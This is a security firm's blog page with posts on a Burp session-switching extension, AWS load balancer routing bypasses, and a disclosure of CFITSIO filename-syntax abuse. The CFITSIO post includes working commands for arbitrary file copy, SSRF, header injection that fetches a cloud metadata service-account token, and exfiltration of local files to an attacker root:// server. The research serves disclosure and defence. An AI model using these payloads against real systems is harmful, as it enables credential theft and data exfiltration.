Doyensec's Blog

Introducing Session Switcher. Swap Burp Sessions with One Click!

2026-06-17T00:00:00+02:00

Authorization testing is one of the most repetitive, yet critical tasks in web app security testing. Checking for horizontal and vertical privilege escalation, IDORs, and other access control issues requires constantly swapping cookies and headers between different user sessions, a process that is error-prone and often becomes tedious.

Today, we’re excited to release Session Switcher, a Burp Suite extension that lets you save and switch HTTP sessions with just a couple of clicks, right from the request editor.

The Problem

During a typical authorization test, you might often find yourself needing to:

Copy cookies from one browser session and paste them into Repeater requests
Keep track of multiple user roles and their authentication tokens
Manually update expired JWTs or session cookies

Doing this manually a couple of times is fine, but having to repeat it multiple times across different endpoints is slow, breaks your focus, and makes it easy to mix up sessions or forget to update expired tokens, potentially leading to false positives and negatives. I don’t know about everyone else, but the number of times I’ve had to go back and replace the cookies again because I wasn’t sure whether I had copied the correct ones is more than I care to admit.

The Solution

Session Switcher adds a Sessions tab directly into Burp’s request editor where you can store named sessions (basically a set of cookies and headers) and swap between them with a single click. Instead of copying and pasting authentication data across requests, you save each user’s session once and then switch to it from a dropdown whenever you need to test a different user/role/tenant. The extension also monitors Proxy traffic and can automatically keep sessions up to date, mirroring the browser, so your stored sessions stay valid throughout the entire engagement.

How Session Switcher Works

Saving Sessions

To save a session, select any request containing the cookies and headers you want to store and click the New button in the Sessions tab of the request editor. The extension automatically extracts all cookies and uncommon headers from that request.

Switching Sessions

Once you have saved sessions, a session selector appears in the Sessions tab of the request editor. Choose a session from the dropdown and the extension instantly replaces the request’s cookies and headers with the saved ones.

This works wherever there’s an editable request editor, such as in Repeater and with intercepted Burp Proxy requests. Buttons under the selector let you Edit, Delete, or Update the selected session from the current request, or create a New one.

By default, the session list is filtered to only show sessions matching the current request’s domain, keeping things clean when you have many sessions stored.
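To make the swap concrete, here is a minimal Python sketch of what replacing a request's cookies and headers with a saved session amounts to. It is not the extension's code: the Session class, the apply_session function, and the sample hostnames and tokens are all hypothetical, and the real extension has configurable capture and apply behavior that this sketch ignores.

```python
from dataclasses import dataclass, field


@dataclass
class Session:
    """A named set of cookies and headers (hypothetical structure)."""
    name: str
    cookies: dict[str, str] = field(default_factory=dict)
    headers: dict[str, str] = field(default_factory=dict)


def apply_session(raw_request: str, session: Session) -> str:
    """Replace the Cookie header and any saved headers in a raw HTTP request."""
    head, sep, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")

    # Header names are case-insensitive, so compare them in lowercase.
    replaced = {"cookie"} | {name.lower() for name in session.headers}
    kept = [
        line for line in header_lines
        if line.split(":", 1)[0].strip().lower() not in replaced
    ]

    # Append the saved headers, then one Cookie header built from the saved cookies.
    kept += [f"{name}: {value}" for name, value in session.headers.items()]
    if session.cookies:
        cookie_value = "; ".join(f"{k}={v}" for k, v in session.cookies.items())
        kept.append(f"Cookie: {cookie_value}")

    return "\r\n".join([request_line, *kept]) + sep + body
```

Headers that are not part of the saved session, such as Host, are left untouched, so only the identity of the request changes.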

Sessions Management Tab

The main Sessions tab lists all sessions stored in your project file, giving you a centralized view to inspect and manage all saved sessions.

Auto Update Rules

One of the most powerful features is the ability to automatically keep sessions up to date with the current state of the browser. You can define rules that monitor browser traffic going through Burp Proxy and update sessions whenever new cookies or headers are detected.

For example, you could create a rule that tracks all requests containing the X-User: alice header and automatically updates the alice session whenever the cookies change. This means you no longer have to manually update sessions when a JWT expires or you re-authenticate in the browser.
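As a rough illustration of the rule described above, the following Python sketch updates a stored session whenever a proxied request carries a matching header. The function names and the rule format (a session name mapped to a header/value pair) are assumptions made for this example and do not reflect how the extension stores or evaluates its rules.

```python
def parse_headers(raw_request: str) -> dict[str, str]:
    """Return request headers as a lowercase-name -> value mapping."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def parse_cookies(cookie_header: str) -> dict[str, str]:
    """Split a Cookie header value into name -> value pairs."""
    cookies = {}
    for pair in cookie_header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def auto_update(sessions, rules, raw_request):
    """Update the cookies of every session whose rule matches the request.

    `rules` maps a session name to a (header name, expected value) condition.
    Returns the names of the sessions that changed.
    """
    headers = parse_headers(raw_request)
    fresh = parse_cookies(headers.get("cookie", ""))
    updated = []
    for session_name, (header, expected) in rules.items():
        if headers.get(header.lower()) == expected and fresh:
            if sessions.get(session_name) != fresh:
                sessions[session_name] = fresh
                updated.append(session_name)
    return updated
```

With rules = {"alice": ("X-User", "alice")}, any browser request carrying X-User: alice refreshes the stored alice cookies, while requests from other users leave them alone.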

This is the simplest example, but much more complex conditions are available, such as tracking JWTs by payload. Check out the documentation for details.

Settings

If the default behavior doesn’t quite fit your workflow, the settings panel lets you tweak things like how cookies and headers are captured from requests and how they get applied when you switch sessions. Some of the options may be confusing, so make sure to check out the documentation for all the available options and what they do.

Installation

Download the latest .jar from the releases page and load it in Burp as a Java extension.

This extension will also be available on the PortSwigger BApp Store as soon as our submission is approved. Due to the current review backlog, our request has not yet been processed, even though it was submitted on April 29th, 2026.

Note: Session Switcher requires Burp Suite v2025.5 or later.

For the Future

We have a few ideas on where to take Session Switcher next:

Auto Inject rules – the counterpart to Auto Update Rules. While Auto Update monitors Burp Proxy traffic to capture sessions, Auto Inject would automatically apply a session to requests passing through Burp Proxy, letting you transparently switch the identity of your browsing session without touching individual requests.
Smarter session tracking – right now, keeping sessions up to date requires manually defining Auto Update rules. We’d like to explore ways to detect and track sessions automatically, for example by parsing login responses or monitoring for token changes, without requiring the user to configure rules upfront.
Macro-based session refresh – instead of relying on a browser to reauthenticate when a session expires, the extension could send a pre-configured request (like a login or token refresh endpoint) and parse the response to update the session automatically. This would make it possible to keep sessions alive indefinitely without any manual intervention.

These are still on the drawing board, so if any of these sound particularly useful (or if you have other ideas), let us know!

Contributing

We’d love to hear how you use Session Switcher and what could make it better for your workflow. Whether it’s a bug report, a feature idea, or just general feedback, don’t hesitate to open an issue on GitHub or reach out on social media (@Doyensec). Pull requests are also very welcome!

Comparing AI Application Security Testing Platforms

2026-05-27T00:00:00+02:00

Doyensec performed a side-by-side comparison of two leading AI-powered penetration testing platforms, Aikido’s Attack AI Pentest and XBOW’s Lightspeed, to evaluate their ability to properly identify vulnerabilities in modern web applications. This included manually validating all findings and classifying them as either true positives or false positives. Additionally, we looked at their overall testing process, including the configuration, impact on tested applications, quality and content of the reports, cost, and speed.

As a leading boutique application security consultancy, we were also curious about how the adoption of AI will impact the future of testing. To understand the current maturity levels of these AI platforms, it was necessary for us to put some vendors’ claims to the test.

If you’re interested in the current state of AI-powered pentesting, we encourage you to give it a read:

Comparing AI Application Security Testing Platforms: Aikido vs. XBOW (PDF, 5 MB)

Navigating Lax Load Balancers: When an Intersection Gets You Inside

2026-05-25T00:00:00+02:00

After our last episode on Multi-SSO Cognito User Pools, we are back with another issue. This time, we are looking at one of those AWS components that is everywhere and rarely questioned deeply enough: the Elastic Load Balancer.

Tidbit No. 5 - Navigating Lax Load Balancers

What is AWS ELB?

AWS Elastic Load Balancing (ELB) distributes traffic to backend services and serves as the entry point between the Internet and your applications.

It supports Layer 7 routing (Application Load Balancer - ALB) and Layer 4 routing (Network Load Balancer - NLB). It decides where traffic goes and under which conditions. ELB is commonly found fronting multiple applications, environments, and trust zones across the same infrastructure.

Why It Matters

ELB is often the first public entry point before application backends, and in many AWS environments, it also becomes part of the access-control boundary. For ALBs, listener rules do more than route traffic: they can enforce authentication with authenticate-oidc or authenticate-cognito, restrict access with source-ip conditions, and decide which target group receives a request based on host, path, headers, or other request attributes.

The simplified flow below shows how a single request can be routed through different rules depending on priority and matching conditions:

That makes the listener rule chain security-sensitive. A backend may appear protected when looking at a single rule, but still be reachable through another rule, another listener, another ALB, or a direct network path that bypasses the expected entry point.

Misconfigurations there could:

Expose backend services that were expected to be reachable only through specific hostnames, paths, or upstream controls
Allow an authentication bypass when an unauthenticated rule forwards to the same targets as an authenticated route
Bypass IP-based gates when the same target group or backend instances are reachable through another routing path without the same source-ip restriction
Bypass CloudFront-level checks when an Internet-facing origin ALB remains directly reachable

Configuration vs. Real Exposure

Standard load balancer reviews usually focus on resource-level hygiene: TLS policies, access logging, deletion protection, security groups, and whether a WAF is attached. These checks are useful, but they mostly describe how the load balancer is configured; they are not carried out with an offensive mindset.

They do not answer the important question: what can an external request actually reach?

What usually gets missed during load balancer audits:

Routing logic issues that let traffic skip restrictive rules
Backend targets that are directly reachable regardless of what the ALB listener enforces
Real attack paths that are invisible to static config review

The Bugs

The following are some of the routing and exposure misconfigurations we encounter most often during AWS load balancer reviews. They are not the only possible ELB issues, but they are representative of a broader class of bugs where the configured routing graph does not match the intended security boundary.

1. CloudFront / WAF Bypass via Direct ALB Access

CloudFront is often placed in front of an ALB to enforce WAF rules, geo-restrictions, caching policies, or rate limiting. In this setup, the ALB is expected to behave like a private origin: users should reach it only through CloudFront, not directly.

The problem appears when the origin ALB is still Internet-facing and its security group allows public inbound traffic. In that case, an attacker could send requests directly to the ALB DNS name, bypassing every control enforced at the CloudFront layer, including WAF rules attached to the distribution.

2. Rule Shadowing

ALB listener rules are evaluated in ascending-priority order. A rule with priority 10 is evaluated before one with priority 20. If a broad rule (e.g., path /*) sits at priority 10 and a more restrictive rule (e.g., path /admin* with authenticate-oidc) sits at priority 20, all traffic to /admin matches the broad rule first. The auth action never fires.

(priority)      (condition)             (action)

[10]            path /*               → forward  → tg-app          (no auth)
[20]            path /admin*          → authenticate-oidc → tg-app  (← never reached for /admin)

This is purely an ordering bug with a direct authentication bypass impact.
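The first-match behavior can be modeled in a few lines of Python. This is a simplified sketch, not a reimplementation of ALB matching: it only handles path patterns, uses fnmatch as a stand-in for ALB wildcards (fnmatch also understands [seq] classes, which ALB does not), and relies on a hypothetical list of probe paths to decide whether a rule ever wins.

```python
from fnmatch import fnmatchcase

# (priority, path pattern, action) tuples mirroring the example above.
RULES = [
    (20, "/admin*", "authenticate-oidc -> tg-app"),
    (10, "/*", "forward -> tg-app"),
]


def first_match(rules, path):
    """Return the rule with the lowest priority number whose pattern matches."""
    for rule in sorted(rules):
        _priority, pattern, _action = rule
        if fnmatchcase(path, pattern):
            return rule
    return None  # the listener's default action would apply


def shadowed_rules(rules, probe_paths):
    """List rules that never win for any probe path they match."""
    shadowed = []
    for rule in rules:
        priority, pattern, _action = rule
        matching = [p for p in probe_paths if fnmatchcase(p, pattern)]
        if matching and all(first_match(rules, p) != rule for p in matching):
            shadowed.append((priority, pattern))
    return shadowed
```

Calling shadowed_rules(RULES, ["/admin", "/admin/users", "/home"]) reports the priority 20 rule, because every path it matches is claimed first by the broader priority 10 rule. Swapping the two priorities makes the finding disappear.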

3. IP Gate Bypass via Alternate ALB

A common pattern is to restrict access to an internal backend by placing a source-ip condition on the rule:

(priority)      (condition)             (action)

[10]            source-ip 1.2.3.4/32  → forward → tg-internal-api
[default]                             → 403

That works only if the protected backend is not reachable through any other path. The issue appears when the same target group, or the same backend instances, are also registered behind another load balancer with weaker conditions.

When that alternate route exists, the source-ip gate is real, but it only protects one path to the backend. The backend remains exposed through the weaker route, where the same IP restriction is not enforced.

That demonstrates why listener rules cannot be reviewed in isolation. The key question is not only “Does this rule restrict access?” but “Is every path to these targets protected by a similar control?”
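One way to answer that question is to group every route by the backend targets it reaches and flag targets that appear behind both a gated and an ungated route. The Python sketch below assumes the routes have already been collected into simple tuples; the load balancer names, instance IDs, and tuple layout are made up for illustration.

```python
from collections import defaultdict

# Each route: (load balancer, rule description, access control or None, backend targets).
ROUTES = [
    ("alb-internal", "source-ip 1.2.3.4/32", "source-ip", {"i-0aaa", "i-0bbb"}),
    ("alb-public", "path /api/*", None, {"i-0bbb", "i-0ccc"}),
]


def inconsistently_protected(routes):
    """Return targets reachable through both a gated and an ungated route."""
    gated = defaultdict(list)
    ungated = defaultdict(list)
    for lb, rule, control, targets in routes:
        bucket = gated if control else ungated
        for target in targets:
            bucket[target].append(f"{lb}: {rule}")
    return {
        target: {"gated": gated[target], "ungated": ungated[target]}
        for target in sorted(gated.keys() & ungated.keys())
    }
```

Here only i-0bbb is reported: it sits behind the source-ip rule on one load balancer and behind an unrestricted path rule on the other.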

Infrastructure is not just configuration. It defines how traffic actually flows, and misconfigurations create unintended paths.

Typical CSPM and audit checklists report on attributes - TLS version, logging flag, and WAF presence - but none of that tells you whether a /supposedly/protected/endpoint path is actually protected end-to-end, whether a CloudFront-fronted ALB is directly reachable, or whether the same backend instance appears in both a gated and an ungated rule.

That requires understanding the routing graph, not just the resource properties.

For Cloud Security Auditors

When reviewing an AWS account with ALBs, answer the following questions:

For each internet-facing ALB: are there any Target Group members that are also registered in a different ALB or listener with weaker (or no) conditions?
Is routing.http.xff_header_processing.mode set to preserve? If yes, does any downstream service trust X-Forwarded-For for access decisions?
Walk listener rules in priority order. For each restrictive rule (auth action, source-ip), is there a broader rule at a lower priority number that matches the same traffic first?
If a CloudFront distribution fronts an ALB, can you send HTTP or HTTPS directly to the ALB DNS and get a non-error response?
For source-ip gated rules: enumerate all paths to the gated targets - same ALB on a different port, a different ALB in the same VPC, an NLB in front of the same instances.

For Developers

When ELBs are used widely across the infrastructure for routing, authentication, or IP-based restrictions, treat the ALB listener rule chain as part of your access-control model, not just networking configuration. Priority ordering matters as much as the conditions themselves. Review it the same way you would review middleware ordering in an application framework.

Do not treat a single IP gate as complete protection for a sensitive backend. A source-ip condition only protects the route where it is enforced. If the same targets are reachable through another ALB, listener, or port without equivalent restrictions, the backend may still be exposed. Combine source-ip conditions with authentication when possible, and verify that no alternate route reaches the same targets.

Lock down security groups on ALB origins. If a CloudFront distribution fronts an ALB, the ALB’s security group inbound rules should allow only CloudFront-managed prefix lists (com.amazonaws.global.cloudfront.origin-facing), not 0.0.0.0/0.
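A quick way to spot the problem is to scan security group ingress rules for world-open CIDRs. The sketch below works on a dictionary shaped like one entry of the SecurityGroups list returned by the EC2 DescribeSecurityGroups API (as exposed by boto3); the function name and the sample group are hypothetical, and fetching the data is left out.

```python
def world_open_ingress(security_group):
    """Return (protocol, from_port, to_port, cidr) for every rule open to any address."""
    findings = []
    for perm in security_group.get("IpPermissions", []):
        cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
        cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
        for cidr in cidrs:
            if cidr in ("0.0.0.0/0", "::/0"):
                findings.append(
                    (perm.get("IpProtocol"), perm.get("FromPort"), perm.get("ToPort"), cidr)
                )
    return findings
```

A group whose only ingress source is a prefix list (the PrefixListIds key) produces no findings, which is the expected shape for an ALB that should only be reachable through CloudFront.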

Set routing.http.xff_header_processing.mode to append or remove on Internet-facing ALBs. If the final backend uses client IP information for access-control decisions, rate limiting, audit logging, or security monitoring, do not allow clients to control the X-Forwarded-For header value.
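The difference between the three modes is easier to see with a small model. The Python sketch below mimics the documented behavior of append, preserve, and remove for a single ALB hop; the function names and IP addresses are illustrative, and it does not cover multi-proxy chains.

```python
def alb_xff(mode, client_ip, incoming_xff=None):
    """Model the X-Forwarded-For value a backend receives for each processing mode."""
    if mode == "append":
        # The connecting client's address is added after whatever the client sent.
        return f"{incoming_xff}, {client_ip}" if incoming_xff else client_ip
    if mode == "preserve":
        # The client-supplied header is forwarded untouched.
        return incoming_xff
    if mode == "remove":
        # The header is dropped before the request reaches the backend.
        return None
    raise ValueError(f"unknown mode: {mode}")


def leftmost(xff):
    """Naive client-IP extraction: trusts the first (client-controlled) entry."""
    return xff.split(",")[0].strip() if xff else None


def rightmost(xff):
    """With a single trusted proxy, take the entry that proxy appended."""
    return xff.split(",")[-1].strip() if xff else None
```

With preserve, a client at 203.0.113.7 that sends X-Forwarded-For: 10.0.0.1 is seen by the backend as 10.0.0.1. With append the backend receives "10.0.0.1, 203.0.113.7", so a backend that reads the leftmost entry is still fooled; only the rightmost entry was written by the load balancer.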

Tool Release: ELBaph

Some of the issues above are hard to spot by looking at a single listener or load balancer in isolation. Finding them requires correlating listeners, rules, target groups, backend instances, and reachability across the whole ELB surface. Doing this manually is time-consuming and annoying, especially in large AWS accounts with a lot of load balancers.

This is why we built doyensec/ELBaph to automate exactly this.

It is a read-only CLI tool written in Go that maps ALBs, NLBs, listeners, rules, and targets into a single routing model. It then looks for exposed paths, runs targeted HTTP/HTTPS reachability probes, and generates a structured report with the root cause, exploit path, and remediation for each finding.

It works with SecurityAudit-style read-only permissions and outputs findings live to the terminal as each check completes, alongside a JSON, Markdown, or SARIF report and an interactive topology.html that maps the full routing graph from VPC to backend targets.

# Scan a region - findings printed live, output folder created automatically
elbaph scan --region us-east-1

# Scan multiple regions using an AWS profile
elbaph scan --all-regions -p my-pentest-profile

ELBaph gave us the extra leverage needed to scale manual ELB reviews. Let us know your feedback!

Hands-On IaC Lab

We also developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/tree/main/lab-elbaph

The lab deploys two Internet-facing ALBs, a CloudFront distribution in front of the public one, and two EC2 instances running a small Go web application, showcasing a few of the misconfigurations described above.


When Filenames Become Attack Surfaces: Weaponizing NASA's CFITSIO Extended Filename Syntax

2026-05-19T00:00:00+02:00

This research was recently presented at BSides Luxembourg 2026. This blogpost documents our findings presented during the talk. The BSides slides are posted here. Today, we’re also releasing the Docker-based playground utilized for the demos so anyone interested can reproduce the findings locally: doyensec/cfitsio-efs-playground.

In our previous post on CFITSIO, we wrote about the AI-assisted fuzzing pipeline and the memory corruption issues found in its Extended Filename Syntax (EFS). This was only half of the story. We kept thinking that even without memory issues, EFS seems like a pretty powerful and rather risky feature. The EFS page is full of very interesting use cases. To quote some of them (emphasis mine):

‘rawfile.dat[i512,512]’: reads raw binary data array (a 512x512 short integer array in this case) and converts it on the fly into a temporary FITS image in memory which is then opened by the application program.

‘ftp://heasarc.gsfc.nasa.gov/test/vela.fits’: FITS files in any ftp archive site on the internet may be opened with read-only access. Files with HTTP addresses may be opened in the same way.

‘myfile.fits[EVENTS][PHA > 5]’: creates and opens a temporary FITS files that is identical to ‘myfile.fits’ except that the EVENTS table will only contain the rows that have values of the PHA column greater than 5. In general, any arbitrary boolean expression using a C or Fortran-like syntax, which may…

That surely looks promising, right?

Therefore, this post is about the next batch of findings. This time, there are no heap overflows or stack corruptions to discuss. We’ll focus on perfectly documented features, useful during file processing, but chained together to achieve some unexpected offensive primitives.

This article is not meant to criticize CFITSIO’s authors or its code. I actively use tools that depend on CFITSIO and appreciate the work behind them. What interests me here is how perfectly reasonable legacy features can become real security problems once the surrounding software and threat model change.

Extended Filename Syntax

As demonstrated, EFS is more than a mere filename parser. It is a mini-language hidden inside a filename parameter, capable of doing very interesting stuff. To understand how it works, we have to look into the source code.

When an EFS-enabled method is used, the input string eventually reaches CFITSIO’s internal ffopen() routine, which runs it through EFS parsing logic before the actual file is opened. At that stage, parts of the string may be reinterpreted as a protocol, outfile clause, extension selector, or filter expression.

The implementation is driver-based. CFITSIO keeps a table of registered backends through fits_register_driver, each associated with a prefix and a set of handler functions such as checkfile, open, create, seek, read, and write. Besides standard files, CFITSIO registers handlers for things like mem://, shmem://, http://, ftps://, and even exotic variants like ftpsmem://, ftpfile://, or ftpscompress://.

This is why EFS can seamlessly jump between local files, memory-backed files, compressed variants, and network protocols without the caller doing anything special.

Some of those drivers implement write, create, or seek methods; others do not.

 status = fits_register_driver("ftpscompress://",
            NULL,
            mem_shutdown,
            mem_setoptions,
            mem_getoptions, 
            mem_getversion,
            NULL,            /* checkfile not needed */ 
            ftps_compress_open,
            0,            /* create function not required */
            mem_truncate,
            mem_close_free,
            0,            /* remove function not required */
            mem_size,
            0,            /* flush function not required */
            mem_seek,
            mem_read,
            mem_write);

To achieve interesting primitives, we need to carefully review what’s available and what’s not.

A Tiny Lab Environment

To simplify testing and demonstration while ensuring reproducibility, we built a minimal Docker playground around CFITSIO. The container includes a tiny helper program called fits-sample-opener. In the insecure mode, it just calls fits_open_file, performs one harmless metadata query, and exits. The helper does almost nothing on purpose. If opening a file causes a network request, a local file copy, or outbound exfiltration, that behavior comes from CFITSIO itself.

That additional metadata query is there for a reason: some EFS behaviors do not fully materialize on the initial open alone. We wanted the sample application to stay minimal while still triggering side effects like a real caller that actually inspects the file it just opened.

The full environment, including the helper program, building instructions, and the fake root:// server used later in this post, is available here.

Make sure to target the right git tag/release as EFS handling might change in the future.

Primitive 1: Arbitrary File Copy

The first surprising behavior comes from the outfile clause. EFS supports the following formula:

input.fits(output.fits)

The meaning is roughly: work on input.fits, but first save a separate copy as output.fits.
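To visualize how a single string carries several instructions, here is a toy Python splitter for the base(outfile)[clause] shape. It is a deliberately simplified illustration and not how CFITSIO parses EFS: the real parser handles protocols, nesting, and many more forms, and the pattern and function name below are invented for this example.

```python
import re

# Toy grammar: base name, optional (outfile), then zero or more [bracketed] clauses.
EFS_PATTERN = re.compile(
    r"^(?P<base>[^(\[]+)"
    r"(?:\((?P<outfile>[^)]*)\))?"
    r"(?P<clauses>(?:\[[^\]]*\])*)$"
)


def split_efs(name):
    """Split an EFS-style string into (base, outfile, [clauses]); simplified."""
    match = EFS_PATTERN.match(name)
    if match is None:
        raise ValueError(f"not handled by this toy parser: {name!r}")
    clauses = re.findall(r"\[([^\]]*)\]", match.group("clauses"))
    return match.group("base"), match.group("outfile"), clauses
```

For input.fits(output.fits) it returns the base name input.fits with output.fits as the outfile, and for myfile.fits[EVENTS][PHA > 5] it returns no outfile and two bracketed clauses. The point is that an application passing a "filename" to the library is in fact passing a small program.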

Now, let’s use our EFS playground and replace input.fits with /etc/passwd:

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener '/etc/passwd(/workspace/foo)'

Even though /etc/passwd is not a FITS file, the copy happens before validation fails. This is an arbitrary file copy primitive. Depending on the target environment, the attack might be followed by copying sensitive files into a web-accessible or otherwise attacker-readable location, or just breaking something to achieve denial-of-service. Of course, standard OS permissions still apply.

Primitive 2: Forced Downloads and SSRF

If the filename starts with http://, https://, ftp://, or ftps://, CFITSIO will reach out to the remote resource and fetch it. The plain http:// and ftp:// paths are handled by raw socket code that has been in the tree for nearly 30 years. There was no concept of Server-Side Request Forgery back then. The TLS variants delegate to libcurl, where the request line is built by the library and is not directly attacker controlled. Either way, the same outfile clause still applies, which is what makes this interesting.

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener 'https://example.com/anyfile(/workspace/grabbed.file)'

This causes CFITSIO to download the remote response and save it to a local path chosen by the attacker, even if the downloaded data is not valid FITS.

At that point the library becomes an SSRF gadget with persistence. It is not just “connect to a remote host”. It is “connect to a remote host, retrieve content, and write it somewhere useful on the local filesystem”.

Primitive 3: HTTP Header Injection

There might be plenty of juicy targets in the local network or on localhost. However, SSRF is often used these days for accessing cloud metadata services. On a compromised cloud workload, the metadata endpoint is a common target because it hands out short-lived service-account tokens that authenticate against the rest of the cloud APIs - turning a single SSRF into broader cloud access. To mitigate basic attacks, cloud metadata services often add extra requirements. For instance, to query the GCP Metadata Service from a Compute Engine instance, you must include the header Metadata-Flavor: Google in your HTTP request. None of the CFITSIO drivers let you explicitly set custom headers.

CFITSIO’s drvrnet.c HTTP driver comes to the rescue. The request line is built with a simple snprintf call:

snprintf(tmpstr, MAXLEN, "GET %s HTTP/1.0\r\n", fn);

The fn component comes from the attacker-controlled filename and is not sanitized before being inserted into the request.

That means newline characters can be embedded into the EFS string to inject additional headers or inject entirely new requests. In practice, this turns a basic outbound request into a request-injection primitive where the attacker can reshape the final HTTP request seen by the target service. Note that we can smuggle several requests at once, but only the very first response will be processed by CFITSIO.

In our demonstrations, this was enough to reach metadata-style endpoints that expect extra headers. For example:

docker run --rm -v "$(pwd)":/workspace cfitsio:4.6.3 \
  fits-sample-opener $'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1\nMetadata-Flavor: Google\nfoo:(/workspace/output.txt)'

The trailing foo: is not padding. We’re using it to comment out the HTTP/1.0\r\n piece that snprintf always appends to our string. The metadata service simply ignores the unknown header and its value.
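The effect is easy to reproduce outside CFITSIO. The Python sketch below applies the same format string to the injected value and splits the result into lines, showing what the target server would see. It assumes fn holds only the path portion of the URL (host and outfile clause already stripped) and does not model the MAXLEN truncation that snprintf applies.

```python
REQUEST_LINE_FORMAT = "GET %s HTTP/1.0\r\n"  # same format string as the snprintf call


def build_request_line(fn):
    """Mimic the unsanitized formatting of the attacker-controlled path."""
    return REQUEST_LINE_FORMAT % fn


payload = (
    "/computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1\n"
    "Metadata-Flavor: Google\n"
    "foo:"
)
wire = build_request_line(payload)
lines = wire.split("\n")
# lines[0] is the forged request line, lines[1] the injected header,
# and lines[2] a throwaway header that absorbs the appended " HTTP/1.0\r".
```

The original protocol suffix ends up as the value of the foo header, so the request remains syntactically acceptable to a lenient server.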

Primitive 4: Local File Exfiltration via root://

Even though we already demonstrated some file exfiltration tricks, these might not work if there is no web server or network-exposed directories.

One might think of a https://example.com/anyfile(https://attacker.com/exfil) payload to download and upload data at the same time. Unfortunately, this doesn’t work. The HTTP driver treats the outfile clause as a local destination name, not as another network URL to open. The HTTP driver also explicitly rejects write attempts.

drvrnet.c:301:

/* don't do r/w files */
  if (rwmode != 0) {
    ffpmsg("Can't open http:// type file with READWRITE access");
    ffpmsg("  Specify an outfile for r/w access (http_open)");
    goto error;
  }

Thus, we started looking for drivers capable of making web connections and sending the data out.

CFITSIO still ships support for a variant of CERN’s rootd protocol. As noted in the code:

Root protocal[sic] doesn’t have any real docs, so, the emperical docs are as follows.
First, you must use a slightly modified rootd server…

Even though we couldn’t find that slightly modified rootd server online, we reconstructed a mock server from the comments and CFITSIO’s code.

This matters because the root:// driver is not just about reading remote data. Through the outfile clause, it can also be used as an exfiltration sink. In other words, the victim process can be tricked into opening a local file and pushing it to an attacker-controlled root:// server.

There are two practical caveats, though.

First, the root:// code expects credentials. In root_openfile, it checks for ROOTUSERNAME and ROOTPASSWORD environment variables, and if they are not set it falls back to reading from stdin with fgets(). In an interactive session this often blocks and ruins the exploit.

  /* get the username */
  if (NULL != getenv("ROOTUSERNAME")) {
    if (strlen(getenv("ROOTUSERNAME")) > MAXLEN-1)
    {
       ffpmsg("root user name too long (root_openfile)");
       return (FILE_NOT_OPENED);
    }
    strcpy(recbuf,getenv("ROOTUSERNAME"));
  } else {
    printf("Username: ");
    fgets(recbuf,MAXLEN,stdin);
    recbuf[strlen(recbuf)-1] = '\0';
  }

However, many real deployments are not interactive. Containers, cron jobs, pipelines, and other batch-style environments frequently run with stdin closed or redirected to EOF. In that case fgets() returns immediately and the exploit continues.
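The non-blocking behavior is a general property of reading from a stream that is already at EOF, not something specific to CFITSIO. As a rough Python analogue of the fgets() call (the child script and function name are made up for this sketch), a process started with stdin attached to the null device gets an empty read straight away instead of waiting for a user:

```python
import subprocess
import sys

# Child process that reads one line from stdin, like the fgets() credential prompt.
CHILD = "import sys; line = sys.stdin.readline(); print(repr(line))"


def read_with_closed_stdin():
    """Run the child with stdin attached to the null device and return what it read."""
    result = subprocess.run(
        [sys.executable, "-c", CHILD],
        stdin=subprocess.DEVNULL,
        capture_output=True,
        text=True,
        timeout=10,
    )
    return result.stdout.strip()
```

The child prints an empty string and exits immediately, which is the situation a container or cron job puts the root:// driver in.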

Second, the driver wants FITS content. Exfiltrating actual FITS files can be a valid attack target, but being able to exfiltrate arbitrary files would be way more rewarding.

Fortunately, this is where EFS becomes absurdly flexible. The raw-data clause [b...] can wrap arbitrary bytes and fabricate a valid in-memory FITS object from them.

The first part of our chain, [b500,1], tells CFITSIO to stop treating the input as a normal FITS file and instead interpret the underlying bytes as raw binary image data. The b selects that raw-binary mode. The 500 is the width of the synthetic image, which in practice means “take 500 bytes per row”. If the source file is larger than that, we still get the first 500 bytes wrapped into the generated image. If it is smaller, the conversion fails and the payload needs to be adjusted. This might require a few tries but eventually we can find the right values. The trailing 1 makes the synthetic image one row high, so the result becomes a simple 500x1 FITS image rather than just an arbitrary byte stream.

The second part, [*,*], is an image-section selector. Here it simply means “select the whole generated image” rather than a sub-range. It may look redundant, but in the tested path it was useful to force CFITSIO to expose the fabricated object as a regular 2D image and move the processing forward cleanly.

In summary, the trick revolves around opening the referenced file, reinterpreting its first bytes as raw pixels, synthesizing a minimal FITS image header around them, and applying some filters. Once that transformation happens, a non-FITS local file becomes good enough for the root:// exfiltration path.
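To get a feel for what the fabricated object looks like, the following Python sketch wraps arbitrary bytes in a minimal 8-bit FITS image using the standard 80-character cards and 2880-byte blocks. It illustrates the file layout only and is not CFITSIO's code; the function names are invented, and the header CFITSIO generates carries a few more cards (such as EXTEND and COMMENT) than this one.

```python
BLOCK = 2880  # FITS files are organized in 2880-byte blocks
CARD = 80     # each header record ("card") is 80 ASCII characters


def card(keyword, value=None):
    """Format one fixed-width header card; values are right-justified to column 30."""
    text = keyword if value is None else f"{keyword:<8}= {value:>20}"
    return text.ljust(CARD).encode("ascii")


def pad(data, fill):
    """Pad data with `fill` up to the next multiple of the block size."""
    return data + fill * (-len(data) % BLOCK)


def wrap_raw_bytes(raw, width=500, height=1):
    """Wrap the first width*height bytes in a minimal 8-bit FITS image."""
    needed = width * height
    if len(raw) < needed:
        raise ValueError("source is smaller than the requested image")
    header = b"".join([
        card("SIMPLE", "T"),
        card("BITPIX", 8),
        card("NAXIS", 2),
        card("NAXIS1", width),
        card("NAXIS2", height),
        card("END"),
    ])
    return pad(header, b" ") + pad(raw[:needed], b"\x00")
```

With the default 500x1 geometry the result is two blocks, 5760 bytes in total: one header block followed by one data block holding the first 500 bytes of the source. A source shorter than 500 bytes raises an error here, mirroring the failed conversion described above.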

